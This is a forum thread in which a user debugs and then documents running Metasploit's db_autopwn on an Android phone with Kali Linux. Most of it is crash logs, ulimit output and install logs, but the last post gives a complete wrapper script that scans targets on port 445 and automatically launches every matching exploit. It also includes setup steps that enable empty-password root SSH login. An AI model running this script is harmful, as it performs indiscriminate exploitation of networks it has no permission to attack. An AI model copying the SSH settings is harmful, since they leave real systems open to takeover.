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Thread: db_autopwn msfconsole Killed

  1. #1
    Join Date

    db_autopwn msfconsole Killed

    UPDATE: I got a S4 running Gummy 4.4.2 / Kali armhf running fine. Something with the mod or the phone was just too low to handle it .. video coming soon

    * ya thats right im running db_autopwn ;P
    * I forkbomb and it seems to run and never get killed ;P
    * I had this issue with ruby before when a system runs out of ram this does not appear to be the case. I still think it is a RAM issue but nothing in dmsg. I think it is Android OS killing it for some reason. I can install packages and fork bomb without it getting killed
    * metasploit v4.7.0-2013081401 [core:4.7 api:1.0]
    * Linux localhost #1 PREEMPT Mon Nov 26 06:41:27 EST 2012 armv7l GNU/Linux
    * armhf
    * it dies in different places so it has something to do with max threads or ram etc

    [*] (65/112 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against[*] (66/112 [0 sessions]): Launching exploit/solaris/samba/trans2open against[*] (67/112 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against
    /usr/local/sbin/AP: line 10: 12937 Killed                  /usr/share/metasploit-framework/msfconsole -r ~/msf.rc
    maybe something with ulimit ?

    root@localhost:/home/android# ulimit -a
    core file size          (blocks, -c) 0
    data seg size           (kbytes, -d) unlimited
    scheduling priority             (-e) 40
    file size               (blocks, -f) unlimited
    pending signals                 (-i) 2919
    max locked memory       (kbytes, -l) 65536
    max memory size         (kbytes, -m) unlimited
    open files                      (-n) 1024
    pipe size            (512 bytes, -p) 8
    POSIX message queues     (bytes, -q) 819200
    real-time priority              (-r) 0
    stack size              (kbytes, -s) 8192
    cpu time               (seconds, -t) unlimited
    max user processes              (-u) 2919
    virtual memory          (kbytes, -v) unlimited
    file locks                      (-x) unlimited
    Last edited by operat0r; 2013-12-22 at 17:54.

  2. #2
    Join Date
    tried within MSF before autopwn to run:

    ulimit -s unlimited
    ulimit -l unlimited
    ulimit -n 50000
    ulimit -q unlimited
    ulimit -e unlimited
    ulimit -i unlimited
    ulimit -u unlimited
    ulimit -c unlimited

    no luck still gets killed randomly

  3. #3
    Join Date
    So I got a S4 running Kali ArmHF and Autopwn seems to run ok having a little issues with msf meterperter connections

  4. #4
    Join Date
    Ok so tried new armel and armhf .. wont even mount in linux deploy ... I think the files are different

    Kali.old.img is the working image
    $ file *
    Kali.img:                   x86 boot sector; partition 1: ID=0x83, active, starthead 0, startsector 2048, 12619776 sectors, code offset 0xb8
    Kali.old.img:               Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=f48e90ef-167c-433b-8aca-ae80ce014c7e (extents) (large files) (huge files)
    kali-linux-1.0.6-armhf.img: x86 boot sector; partition 1: ID=0x83, active, starthead 0, startsector 2048, 11505664 sectors, code offset 0xb8
    Here is the output of linux deploy .. it can't even downlaod the image ..
    [22:32:54] + [ file == partition ]
    [22:32:54] + msg done
    [22:32:54] + echo done 
    [22:32:54] + [ file == file ]
    [22:32:54] + [ 0 -eq 0 ]
    [22:32:54] + [ -f /data/sdext2/Kali.img ]
    [22:32:54] + stat -c %s /data/sdext2/Kali.img
    [22:32:54] + FILE_SIZE=4293918720
    [22:32:54] + dirname /data/sdext2/Kali.img
    [22:32:54] + DIR_NAME=/data/sdext2
    [22:32:54] + stat -c %s -f /data/sdext2
    [22:32:54] + BLOCK_SIZE=4096
    [22:32:54] + stat -c %a -f /data/sdext2
    [22:32:54] Making new disk image (4095 MB) ... + AVAILABLE_SIZE=1648172
    [22:32:54] + let AVAILABLE_SIZE=(4096*1648172)+4293918720
    [22:32:54] + let IMG_SIZE=(11044831232-11044831232/10)/1048576
    [22:32:54] + [ 9479 -gt 4095 ]
    [22:32:54] + IMG_SIZE=4095
    [22:32:54] + msg -n Making new disk image (4095 MB) ... 
    [22:32:54] + echo -n Making new disk image (4095 MB) ... 
    [22:32:55] + set -e
    [22:32:55] + dd if=/dev/zero of=/data/sdext2/Kali.img bs=1048576 seek=4095 count=0
    [22:32:55] 0+0 records in
    [22:32:55] 0+0 records out
    [22:32:55] 0 bytes (0 B) copied, 6.1035e-05 s, 0.0 kB/s
    [22:32:55] + exit 0
    [22:32:55] done 
    [22:32:55] + [ 0 -eq 0 ]
    [22:32:55] + msg done
    [22:32:55] + echo done 
    [22:32:55] + [ file == file -o file == partition ]
    [22:32:55] + cat /proc/filesystems
    [22:32:55] + grep ext4
    [22:32:55] Making file system (ext4) ... + [ -n 	ext4 ]
    [22:32:55] + fs_support=ext4
    [22:32:55] + break
    [22:32:55] + [ -z ext4 ]
    [22:32:55] + [ auto == auto ]
    [22:32:55] + FS_TYPE=ext4
    [22:32:55] + msg -n Making file system (ext4) ... 
    [22:32:55] + echo -n Making file system (ext4) ... 
    [22:32:55] + set -e
    [22:32:55] + losetup
    [22:32:55] + grep /data/sdext2/Kali.img
    [22:32:55] + true
    [22:32:55] + is_loop=
    [22:32:55] + cat /proc/mounts
    [22:32:55] + grep /data/sdext2/Kali.img
    [22:32:55] + true
    [22:32:55] + is_raw=
    [22:32:55] + [ -z  -a -z  ]
    [22:32:55] + mke2fs -qF -t ext4 -O ^has_journal /data/sdext2/Kali.img
    [22:32:55] ext2fs_check_if_mount: Can't check if filesystem is mounted due to missing mtab file while determining whether /data/sdext2/Kali.img is mounted.
    [22:33:05] + exit 0
    [22:33:05] + [ 0 -eq 0 ]
    [22:33:05] + msg done
    [22:33:05] + echo done 
    [22:33:05] + return 0
    [22:33:05] + [ 0 -ne 0 ]
    [22:33:05] + msg Mounting partitions: 
    [22:33:05] + echo Mounting partitions:  
    [22:33:05] + mount_system root
    [22:33:05] + [ 1 -eq 0 ]
    [22:33:05] + [ 1 -gt 1 ]
    [22:33:05] + msg -n / ... 
    [22:33:05] + echo -n / ... 
    [22:33:05] + cat /proc/mounts
    [22:33:05] + grep  /data/local/linux/mnt 
    [22:33:05] + is_mnt=
    [22:33:05] + [ -z  ]
    [22:33:05] + [ ! -d /data/local/linux/mnt ]
    [22:33:05] + [ -d /data/sdext2/Kali.img ]
    [22:33:05] + MNT_OPTS=rw,relatime
    [22:33:05] + mount -o rw,relatime /data/sdext2/Kali.img /data/local/linux/mnt
    [22:33:05] done 
    [22:33:05] Mounting partitions:  
    [22:33:05] / ... done 
    [22:33:05] Installing Debian-based distribution:  
    [22:33:05] + [ 0 -eq 0 ]
    [22:33:05] + msg done
    [22:33:05] + echo done 
    [22:33:05] + return 0
    [22:33:05] + [ 0 -ne 0 ]
    [22:33:05] + msg Installing Debian-based distribution: 
    [22:33:05] + echo Installing Debian-based distribution:  
    [22:33:05] + BASIC_PACKAGES=locales,sudo,man-db
    [22:33:05] + [ -z  ]
    [22:33:05] + DEBOOTSTRAP_DIR=/data/local/linux/deploy/debootstrap
    [22:33:05] + export DEBOOTSTRAP_DIR
    [22:33:05] + debootstrap --no-check-gpg --arch armhf --foreign --extractor=ar --include=locales,sudo,man-db kali /data/local/linux/mnt
    [22:33:05] I: Retrieving Release
    [22:33:05] E: Failed getting release file
    [22:33:05] + [ 1 -ne 0 ]
    [22:33:05] + return 1
    [22:33:05] + msg <<< end: install
    [22:33:05] + echo <<< end: install 
    [22:33:05] <<< end: install 
    [22:33:05] + exit
    Last edited by operat0r; 2014-03-01 at 03:30.

  5. #5
    Join Date
    7 worked for me moving linux deploy wget to wget.old and after that clicking the install button

    * T-Mobile T759 (Samsung Galaxy S4)
    * Gummy-2.1-12-18-13-NIGHTLY-jfltetmo
    * 16gig card formatted first fat32 8.5gig and ext2 7.3gig ( using Link2SD on appstore to mount the ext2 part)
    # Looks I did not setup like you can use FAT32 and still have a gig or so free. so I will most likly go back to normal FAT32 single part
    /data/sdext2/Kali2.img Kali2.img  (4293918720 bytes in 873.174s)
    * install linux deploy
    * select Kali
    * leave the size to auto if you like or set the size and path to above 4gig to what ever Link2SD mounted your other ext2 partition to see below for 4+gig image
    * before you click install i had to remove the apps wget and use my native wget
    mv /data/local/linux/bin/wget /data/local/linux/bin/wget.old 
    * installs normaly I enable ssh only.. login android password changeme
    * apt-get install metasploit screen -y
    * allow  blank root login.. vi /etc/ssh/sshd_config ... /etc/init.d/ssh restart
    PermitEmptyPasswords yes
    PermitRootLogin yes
    #UsePAM yes
    PasswordAuthentication yes
    * stop postgres
    /etc/init.d/postgresql stop
    * start postgres
    su postgres -c "/usr/lib/postgresql/9.1/bin/postgres  -D /etc/postgresql/9.1/main/" &
    * you may not need the above step .. I had issues before with postgres starting
    * create msf user
    su postgres -c "createuser msf -P"
    * get autopwn script
    wget -U notwgetiblockit   -O /usr/share/metasploit-framework/plugins/db_autopwn.rb ''
    * Autopwn script for Kali  put in /usr/local/sbin/AP 
    * usage AP
    # set ulimit to 50K not 1024
    # stop postgres
    /etc/init.d/postgresql stop
    sleep 3
    # start postgres
    su postgres -c "/usr/lib/postgresql/9.1/bin/postgres  -D /etc/postgresql/9.1/main/" &
    sleep 20
    # drop and create DB
    su postgres -c "dropdb msf;createdb --owner=msf msf"
    ulimit -s unlimited
    ulimit -l unlimited
    ulimit -n 50000
    ulimit -q unlimited
    ulimit -e unlimited
    ulimit -i unlimited
    ulimit -u unlimited
    ulimit -c unlimited
    # load db_autopwn.rb ,connect , run nmap,autopwn
    echo "load db_autopwn" > ~/msf.rc
    echo "sleep 5"  >> ~/msf.rc
    echo "db_connect msf:[email protected]/msf" >> ~/msf.rc
    echo "sleep 5"  >> ~/msf.rc
    echo "db_nmap -p 445 $1" >> ~/msf.rc
    echo "sleep 5"  >> ~/msf.rc
    echo bash -c \'ulimit -s unlimited\' >> ~/msf.rc
    echo bash -c \'ulimit -l unlimited\' >> ~/msf.rc
    echo bash -c \'ulimit -n 50000\' >> ~/msf.rc
    echo bash -c \'ulimit -q unlimited\' >> ~/msf.rc
    echo bash -c \'ulimit -e unlimited\' >> ~/msf.rc
    echo bash -c \'ulimit -i unlimited\' >> ~/msf.rc
    echo bash -c \'ulimit -u unlimited\' >> ~/msf.rc
    echo bash -c \'ulimit -c unlimited\' >> ~/msf.rc
    echo "db_autopwn -p -t -e -v " >> ~/msf.rc
    /usr/share/metasploit-framework/msfconsole -r ~/msf.rc
    For large 4+gig image
    * setup fat32 as first and ext2 as second
    * use Link2SD to auto mount both partitions
    * my path was /data/sdext2/Kali.img
    Last edited by operat0r; 2014-03-02 at 05:22.

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